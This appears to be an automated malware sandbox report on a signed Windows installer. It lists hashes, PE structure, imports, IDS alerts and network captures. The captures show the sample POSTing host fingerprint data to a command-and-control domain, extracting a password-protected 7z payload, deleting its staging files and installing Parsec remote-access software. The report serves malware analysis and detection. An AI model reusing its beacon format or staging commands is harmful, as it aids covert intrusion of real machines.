                              Preview:p...... ....$.....=.:6..(................C...6.......;.......................;.. ........H.r56.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.l.o.E.u.g.z.U.P.G.t.9.O.n.V.Z.%.2.F.P.P.g.l.s.%.3.D...
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):412
                              Entropy (8bit):4.004975054723184
                              Encrypted:false
                              SSDEEP:6:kKmRNzR1MyFiUfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:eRRRBJmxMiv8sFBSfamB3rbFURMOlAkr
                              MD5:1950180D10CB8934CFB0C1B5839C678C
                              SHA1:50FED07FF70A6C14ADE1DE18DCB6CED2AC054508
                              SHA-256:46C82A83C156EC96ED17381074A106A3A19B79514A26EC89EFBB44DFADD8E0E8
                              SHA-512:DC98E8F8C585E92A1C0281463F25BA0F1C9044A8CB81939F32A5F704E126BF216C078C8E46B89A8B6639FEAE9A5A07EA9AC5FBCF88FF9E624E2FCF5875FF13CA
                              Malicious:false
                              Preview:p...... ....(.......:6..(.................F..5...]*.{;...................]*.{;.. ..........[-6.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                              Process:C:\Windows\SysWOW64\netsh.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7
                              Entropy (8bit):2.2359263506290326
                              Encrypted:false
                              SSDEEP:3:t:t
                              MD5:F1CA165C0DA831C9A17D08C4DECBD114
                              SHA1:D750F8260312A40968458169B496C40DACC751CA
                              SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                              SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                              Malicious:false
                              Preview:Ok.....
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):70
                              Entropy (8bit):4.795224760012763
                              Encrypted:false
                              SSDEEP:3:tR60PUdZ4jcRCFMLDJOBFXRN8y:CdZ4jcZLDJOBFBN8y
                              MD5:9D2F373995D9E914835C389C91AD69ED
                              SHA1:2B497BAFFF1FE8C1B8128D5D78A5BFC591C5FE61
                              SHA-256:BBB2978DAFCCA12DF906ED63901251181902B7B567A8C95E08746C35212CDA7F
                              SHA-512:4A650C623495DCAA47F11158B6A67D4899B4127501FE50753E2E08FABF1BFBAE7ADAD17434C109A7D3B925AC33CB7295BC1F4B9BB034D350FD07E0FC71836B1A
                              Malicious:false
                              Preview:2024-11-13 21:12:18,893 INFO [default] Driver installed successfully..
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.997278229743437
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.45%
                              • Inno Setup installer (109748/4) 1.08%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              File name:uu8v4UUzTU.exe
                              File size:50'493'432 bytes
                              MD5:2d2f050e6c898065032cb2686a0effca
                              SHA1:0d3c1fbd9b7db74fdb5ee155b610d86319d9fa51
                              SHA256:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9
                              SHA512:5fcd58c259cd020f5b4afe8802a6588e7a942ef53cf5175f6f18c900e8ed7e6b5009370b0b0e06969e4ecc7c26dcd7e8f3318907411fc7df62ccb797ec04f67e
                              SSDEEP:786432:HyiiDc4ImIc9SLIJyNwsNBIRya++/sC89UTh/1m1OO2+3FJRYd17TV+s:SiiD9KL85sNBIRyX0M9gG1OO//2rh+s
                              TLSH:E4B7333B71A4B43FC4AA463A5F73531448B37E91A9C78D2A43E0161CCB25EA01E7A777
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                              Icon Hash:01020d1930310f3c
                              Entrypoint:0x4b5eec
                              Entrypoint Section:.itext
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6258476F [Thu Apr 14 16:10:23 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:1
                              File Version Major:6
                              File Version Minor:1
                              Subsystem Version Major:6
                              Subsystem Version Minor:1
                              Import Hash:e569e6f445d32ba23766ad67d1e3787f
                              Signature Valid:false
                              Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                              Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                              Error Number:-2146762495
                              Not Before, Not After
                              • 29/08/2024 01:06:14 28/08/2025 19:23:48
                              Subject Chain
                              • OID.1.3.6.1.4.1.311.60.2.1.3=KE, OID.2.5.4.15=Private Organization, CN=KEMROSE ENTERPRISES LTD, SERIALNUMBER=CPR/2010/34857, O=KEMROSE ENTERPRISES LTD, L=Nairobi, S=Nairobi, C=KE
                              Version:3
                              Thumbprint MD5:6E17F82AC2A84546205F6D343FA436A5
                              Thumbprint SHA-1:E1AA448D29371254654C29C65A5309686ACD93D0
                              Thumbprint SHA-256:A89FF2FD4D4690D199C5DAC33F5EF7D9DBB10069213FD2A60389870CE960CF27
                              Serial:1BF8761F7761C3FDB27BF20B88C21357
                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFA4h
                              push ebx
                              push esi
                              push edi
                              xor eax, eax
                              mov dword ptr [ebp-3Ch], eax
                              mov dword ptr [ebp-40h], eax
                              mov dword ptr [ebp-5Ch], eax
                              mov dword ptr [ebp-30h], eax
                              mov dword ptr [ebp-38h], eax
                              mov dword ptr [ebp-34h], eax
                              mov dword ptr [ebp-2Ch], eax
                              mov dword ptr [ebp-28h], eax
                              mov dword ptr [ebp-14h], eax
                              mov eax, 004B14B8h
                              call 00007F08750CA9A5h
                              xor eax, eax
                              push ebp
                              push 004B65E2h
                              push dword ptr fs:[eax]
                              mov dword ptr fs:[eax], esp
                              xor edx, edx
                              push ebp
                              push 004B659Eh
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              mov eax, dword ptr [004BE634h]
                              call 00007F087516D497h
                              call 00007F087516CFEAh
                              lea edx, dword ptr [ebp-14h]
                              xor eax, eax
                              call 00007F08750E0444h
                              mov edx, dword ptr [ebp-14h]
                              mov eax, 004C1D84h
                              call 00007F08750C5597h
                              push 00000002h
                              push 00000000h
                              push 00000001h
                              mov ecx, dword ptr [004C1D84h]
                              mov dl, 01h
                              mov eax, dword ptr [004238ECh]
                              call 00007F08750E15C7h
                              mov dword ptr [004C1D88h], eax
                              xor edx, edx
                              push ebp
                              push 004B654Ah
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              call 00007F087516D51Fh
                              mov dword ptr [004C1D90h], eax
                              mov eax, dword ptr [004C1D90h]
                              cmp dword ptr [eax+0Ch], 01h
                              jne 00007F087517373Ah
                              mov eax, dword ptr [004C1D90h]
                              mov edx, 00000028h
                              call 00007F08750E1EBCh
                              mov edx, dword ptr [004C1D90h]
                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0xc4000 | 0x9a | .edata
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2000 | 0xfdc | .idata
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x1e5a0 | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x3026938 | 0xec0 |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_TLS | 0xc6000 | 0x18 | .rdata
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IAT | 0xc22f4 | 0x254 | .idata
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xc3000 | 0x1a4 | .didata
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                               Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x1000 | 0xb39e4 | 0xb3a00 | 43af0a9476ca224d8e8461f1e22c94da | False | 0.34525867693110646 | data | 6.357635049994181 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .itext | 0xb5000 | 0x1688 | 0x1800 | 185e04b9a1f554e31f7f848515dc890c | False | 0.54443359375 | data | 5.971425428435973 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                               .data | 0xb7000 | 0x37a4 | 0x3800 | cab2107c933b696aa5cf0cc6c3fd3980 | False | 0.36097935267857145 | data | 5.048648594372454 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .bss | 0xbb000 | 0x6de8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .idata | 0xc2000 | 0xfdc | 0x1000 | e7d1635e2624b124cfdce6c360ac21cd | False | 0.3798828125 | data | 5.029087481102678 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .didata | 0xc3000 | 0x1a4 | 0x200 | 8ced971d8a7705c98b173e255d8c9aa7 | False | 0.345703125 | data | 2.7509822285969876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .edata | 0xc4000 | 0x9a | 0x200 | 8d4e1e508031afe235bf121c80fd7d5f | False | 0.2578125 | data | 1.877162954504408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .tls | 0xc5000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               .rdata | 0xc6000 | 0x5d | 0x200 | 8f2f090acd9622c88a6a852e72f94e96 | False | 0.189453125 | data | 1.3838943752217987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               .rsrc | 0xc7000 | 0x1e5a0 | 0x1e600 | 0ccf407773fbfa810622326e22620cbb | False | 0.18008134002057613 | data | 3.5767248033948214 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                               Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                               RT_ICON | 0xc7558 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.4441489361702128
                               RT_ICON | 0xc79c0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.294672131147541
                               RT_ICON | 0xc8348 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.21411819887429642
                               RT_ICON | 0xc93f0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.13838174273858922
                               RT_ICON | 0xcb998 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.1069910250354275
                               RT_ICON | 0xcfbc0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.05820418786229741
                               RT_ICON | 0xe03e8 | 0x21f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9807979763136714
                               RT_STRING | 0xe25e4 | 0x360 | data | | | 0.34375
                               RT_STRING | 0xe2944 | 0x260 | data | | | 0.3256578947368421
                               RT_STRING | 0xe2ba4 | 0x45c | data | | | 0.4068100358422939
                               RT_STRING | 0xe3000 | 0x40c | data | | | 0.3754826254826255
                               RT_STRING | 0xe340c | 0x2d4 | data | | | 0.39226519337016574
                               RT_STRING | 0xe36e0 | 0xb8 | data | | | 0.6467391304347826
                               RT_STRING | 0xe3798 | 0x9c | data | | | 0.6410256410256411
                               RT_STRING | 0xe3834 | 0x374 | data | | | 0.4230769230769231
                               RT_STRING | 0xe3ba8 | 0x398 | data | | | 0.3358695652173913
                               RT_STRING | 0xe3f40 | 0x368 | data | | | 0.3795871559633027
                               RT_STRING | 0xe42a8 | 0x2a4 | data | | | 0.4275147928994083
                               RT_RCDATA | 0xe454c | 0x10 | data | | | 1.5
                               RT_RCDATA | 0xe455c | 0x2c4 | data | | | 0.6384180790960452
                               RT_RCDATA | 0xe4820 | 0x2c | data | | | 1.1818181818181819
                               RT_GROUP_ICON | 0xe484c | 0x68 | data | English | United States | 0.7884615384615384
                               RT_VERSION | 0xe48b4 | 0x584 | data | English | United States | 0.26203966005665724
                               RT_MANIFEST | 0xe4e38 | 0x765 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39091389329107235
                               DLL | Import
                               kernel32.dll | GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                               comctl32.dll | InitCommonControls
                               version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                               user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                               oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                               netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
                               advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
                               Name | Ordinal | Address
                               TMethodImplementationIntercept | 3 | 0x4541a8
                               __dbk_fcall_wrapper | 2 | 0x40d0a0
                               dbkFCallWrapperAddr | 1 | 0x4be63c
                               Language of compilation system | Country where language is spoken | Map
                               English | United States |
                               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                               2024-11-14T03:11:52.847685+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 34.160.111.145 | 443 | TCP
                               2024-11-14T03:11:53.815227+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP
                               2024-11-14T03:11:54.801247+0100 | 2051091 | ET MALWARE Unknown Malvertising Payload CnC Checkin (PSecWin) | 1 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP
                               2024-11-14T03:11:56.380228+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49735 | TCP
                               2024-11-14T03:12:34.698407+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 20.109.210.53 | 443 | 192.168.2.4 | 49751 | TCP
                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                               Nov 14, 2024 03:11:52.196865082 CET | 192.168.2.4 | 1.1.1.1 | 0x96b4 | Standard query (0) | ifconfig.me | A (IP address) | IN (0x0001) | false
                               Nov 14, 2024 03:11:53.161288977 CET | 192.168.2.4 | 1.1.1.1 | 0x6000 | Standard query (0) | beautifullyuncluttered.com | A (IP address) | IN (0x0001) | false
                               Nov 14, 2024 03:12:22.228529930 CET | 192.168.2.4 | 1.1.1.1 | 0x8175 | Standard query (0) | builds.parsec.app | A (IP address) | IN (0x0001) | false
                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                               Nov 14, 2024 03:11:52.204200029 CET | 1.1.1.1 | 192.168.2.4 | 0x96b4 | No error (0) | ifconfig.me | | 34.160.111.145 | A (IP address) | IN (0x0001) | false
                               Nov 14, 2024 03:11:53.175715923 CET | 1.1.1.1 | 192.168.2.4 | 0x6000 | No error (0) | beautifullyuncluttered.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                               Nov 14, 2024 03:11:53.175715923 CET | 1.1.1.1 | 192.168.2.4 | 0x6000 | No error (0) | beautifullyuncluttered.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                               Nov 14, 2024 03:11:57.952488899 CET | 1.1.1.1 | 192.168.2.4 | 0x5e4f | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
                               Nov 14, 2024 03:11:57.952488899 CET | 1.1.1.1 | 192.168.2.4 | 0x5e4f | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
                               Nov 14, 2024 03:12:22.235949993 CET | 1.1.1.1 | 192.168.2.4 | 0x8175 | No error (0) | builds.parsec.app | | 104.18.0.181 | A (IP address) | IN (0x0001) | false
                               Nov 14, 2024 03:12:22.235949993 CET | 1.1.1.1 | 192.168.2.4 | 0x8175 | No error (0) | builds.parsec.app | | 104.18.1.181 | A (IP address) | IN (0x0001) | false
                              • ifconfig.me
                              • beautifullyuncluttered.com
                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               0 | 192.168.2.4 | 49733 | 34.160.111.145 | 443 | 6880 | C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp

                               Timestamp | Bytes transferred | Direction | Data
                               2024-11-14 02:11:52 UTC | 196 | OUT | GET /ip HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: application/x-www-form-urlencoded
                               Accept: */*
                               User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                               Host: ifconfig.me
                               2024-11-14 02:11:53 UTC | 227 | IN | HTTP/1.1 200 OK
                               date: Thu, 14 Nov 2024 02:11:52 GMT
                               content-type: text/plain
                               Content-Length: 14
                               access-control-allow-origin: *
                               via: 1.1 google
                               Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                               Connection: close
                               2024-11-14 02:11:53 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                               Data Ascii: 173.254.250.91


                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                               1 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | 6880 | C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp

                               Timestamp | Bytes transferred | Direction | Data
                               2024-11-14 02:11:53 UTC | 255 | OUT | POST /?CheckApp HTTP/1.1
                               Connection: Keep-Alive
                               Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
                               Accept: */*
                               User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                               Content-Length: 156
                               Host: beautifullyuncluttered.com
                               2024-11-14 02:11:53 UTC | 156 | OUT | Data Raw: 66 61 30 37 33 64 62 39 36 31 63 64 33 36 34 63 31 66 30 61 64 62 35 63 35 32 66 62 33 64 66 39 0d 0a 31 30 2e 30 30 2e 31 39 30 34 35 0d 0a 59 65 73 0d 0a 59 65 73 0d 0a 4d 69 63 72 6f 73 6f 66 74 20 44 65 66 65 6e 64 65 72 20 41 6e 74 69 76 69 72 75 73 0d 0a 30 36 31 35 34 34 0d 0a 6a 6f 6e 65 73 0d 0a 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 50 53 65 63 57 69 6e 0d 0a 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31
                               Data Ascii (fields separated by CRLF in the raw bytes): fa073db961cd364c1f0adb5c52fb3df9\r\n10.00.19045\r\nYes\r\nYes\r\nMicrosoft Defender Antivirus\r\n061544\r\nuser\r\nC:\Users\user\AppData\Roaming\PSecWin\r\n173.254.250.91
                               2024-11-14 02:11:54 UTC | 810 | IN | HTTP/1.1 200 OK
                               Date: Thu, 14 Nov 2024 02:11:54 GMT
                               Content-Type: text/html; charset=UTF-8
                               Transfer-Encoding: chunked
                               Connection: close
                               Access-Control-Allow-Origin: *
                               cf-cache-status: DYNAMIC
                               Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CLohT98Pa1pWF8IqsMkGIkqmZV3wrYu1MortzSxDBTJ%2FfIE3V8ys8kqJlL8Br5Xw5D0OkK1odIfuGIsxLF61u7IR5JL4eXWeCrgHQ5BtmXRS55FxuOvPnDNA1LyJGPmNdnPJbbFJfPUqlE5j8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                               NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                               Server: cloudflare
                               CF-RAY: 8e237935bc873acf-DFW
                               alt-svc: h3=":443"; ma=86400
                               server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2866&recv_bytes=1047&delivery_rate=2524847&cwnd=230&unsent_bytes=0&cid=afa7dd2f559a54ef&ts=1010&x=0"
                               2024-11-14 02:11:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                               Data Ascii: 0


                              Target ID:0
                              Start time:21:11:38
                              Start date:13/11/2024
                              Path:C:\Users\user\Desktop\uu8v4UUzTU.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\uu8v4UUzTU.exe"
                              Imagebase:0x400000
                              File size:50'493'432 bytes
                              MD5 hash:2D2F050E6C898065032CB2686A0EFFCA
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:21:11:38
                              Start date:13/11/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-HDJTG.tmp\uu8v4UUzTU.tmp" /SL5="$10410,49640288,887296,C:\Users\user\Desktop\uu8v4UUzTU.exe"
                              Imagebase:0x400000
                              File size:3'220'480 bytes
                              MD5 hash:828B7D7624C14BE1F3D8122F6E2FAC53
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:3
                              Start time:21:11:53
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"CMD" /C "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:21:11:53
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\AppData\Roaming\PSecWin\7z.exe" x -aoa "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z" -p"fa073db961c" -o"C:\Users\user\AppData\Roaming\PSecWin\"
                              Imagebase:0x410000
                              File size:557'056 bytes
                              MD5 hash:9A1DD1D96481D61934DCC2D568971D06
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:6
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"CMD" /C del "C:\Users\user\AppData\Roaming\PSecWin\SoundNight.7z.bat"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"CMD" /C del "SoundNight.7z"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:21:11:54
                              Start date:13/11/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
